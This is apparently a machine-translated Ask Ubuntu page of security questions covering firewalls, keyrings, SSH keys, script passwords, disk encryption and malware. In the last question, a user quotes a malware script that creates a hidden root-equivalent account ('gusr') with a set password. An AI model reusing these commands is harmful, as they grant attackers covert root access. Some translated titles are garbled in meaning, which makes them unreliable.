Questions tagged «security»

安全性涵盖了广泛的主题,包括用户,权限,身份验证,授权,升级,防火墙,强化等。

8
这些天真的需要防火墙吗?[关闭]
按照目前的情况,这个问题并不适合我们的问答形式。我们希望答案会得到事实,参考或专业知识的支持,但是这个问题可能会引起辩论,争论,民意调查或扩展讨论。如果您认为此问题可以解决并且可以重新提出,请访问帮助中心以获取指导。 9年前关闭。 我应该安装类似gufw的东西吗?

4
什么是默认密码?
default和login有什么区别? 又是什么默认密钥环是什么意思? 当我运行某些应用程序(如Emphaty等)时,首先启动“ 解锁钥匙圈”窗口,然后需要我输入密码。为什么? 这是我运行Emphaty时的屏幕截图。 为什么需要我输入密码?这只是一个使者。这让我发疯。 我能够找到这个窗口。我猜这个Windows可以给我解决方案。 在尝试解决问题之前,我想知道它们是什么。 请给我解释一下。 PS我的登录密码现在不等于默认密码。


1
如何给受信任的朋友ssh访问?
我有一个足够信任的朋友,可以通过ssh访问我的一台服务器。为此,我为他创建了一个用户帐户。 该框只能通过密钥验证访问,而不能通过密码访问。我已经为该帐户创建了私钥,但是如果我通过电子邮件将其发送给他,那么我们就失去了更强安全性的意义 使他无需重新使用密码身份验证即可访问此帐户的最佳方法是什么? 额外的困难:他在Windows机器上,但是足够容易安装PuTTY
13 security  ssh 


3
存储脚本使用的密码的最不安全的方法是什么?
我有一个Bash脚本,可以使用我的用户名和密码自动对服务进行身份验证。凭据当前在脚本中存储为纯文本。 在仍然允许脚本访问的同时,应采取哪些预防措施以最安全地存储这些凭据? 澄清要点: 我知道,如果可用,应该使用其他身份验证方法代替。我仍然想知道在密码验证是唯一选择的情况下该怎么做。 这里根本不存储密码是不可接受的答案。我问的是脚本必须可以无人值守访问密码的情况。

4
FDE(全盘加密)如何如此迅速地工作?
我很好奇Ubuntu的全盘加密如何在后台运行。这是一个例子: 将以下字符串视为磁盘的所有内容: hello world 在应用某种加密方法后,它将看起来像这样:( 在此示例中,我使用了+1位移的Caesar密码,例如A→B; B→C ...) ifmmp xpsme 据我了解,当计算机关闭时,驱动器的内容就是上面的字符串。但是,当它重新打开时,Ubuntu需要再次恢复其内容hello world才能成功启动。 我没有真正得到的是,在现实世界中,磁盘的内容要多得多,加密算法要复杂得多,我发现计算机很难在几秒钟内完全加密/解密所有磁盘(启动或关闭不需要花费更长的时间)。 这怎么可能?



1
安全漏洞INTEL-SA-00086
英特尔最近在其网站上发布了一个严重的安全漏洞。许多处理器系列都受到影响。使用他们的工具,我的笔记本电脑被确定为受影响。知道如何减轻Ubuntu中的此类问题吗? 提前致谢
12 security  intel 

2
“〜/。葡萄酒不归您所有”,我安全吗?
因此,当我遇到使用sudo获取管理员特权的建议时,我正在尝试在wine中安装一些东西。那是我收到以上消息的时候 ~/.wine is not owned by you 通过阅读,我很快意识到为什么出现此消息,并且尝试sudo喝酒是一个非常糟糕的想法。 所以我什么也没做,也不想再sudo喝酒了。我的问题是,因为我收到了此封锁,我安全吗?还是我需要删除所有的酒?
12 wine  sudo  security  malware 


3
为什么apt-get安装Virtual Box而不是g ++?
我刚遇到一个我不知道可能与Linux终端有关的主要安全问题。我正在尝试安装g ++ 5.0。我是Linux的新手,所以我输入了sudo apt-get install g++ 5.0。它安装了Virtual Box,而不仅仅是返回错误或其他内容! 如果我尝试从终端安装一件东西而安装了完全不同的东西,这是否意味着可能会发生其他事情,可能是恶意软件?无论如何,当我输入完全不同的内容时,为什么还要安装Virtual Box?


1
如何处理笔记本电脑上的恶意软件?
我相当确定我的Ubuntu 13.10笔记本电脑感染了某种恶意软件。 每隔一段时间,我会发现一个进程/ lib / sshd(由root拥有)正在运行并消耗大量cpu。不是运行/ usr / sbin / sshd的sshd服务器。 二进制文件具有--wxrw-rwt权限,并且在/ lib目录中生成并生成脚本。最近的一个名为13959730401387633604,它执行以下操作 #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusr用户是由恶意软件独立创建的,然后chpasswd挂起,而占用了100%的cpu。 到目前为止,我已经确定gusr用户已另外添加到/ etc /中的文件中。 /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid 似乎该恶意软件使用“-”后缀复制了所有这些文件。由root修改的/ etc /文件的完整列表在此处。 此外,/ etc / hosts文件已更改为this。 / lib / sshd首先将自身添加到/etc/init.d/rc.local文件的末尾! …
12 security  malware 

By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.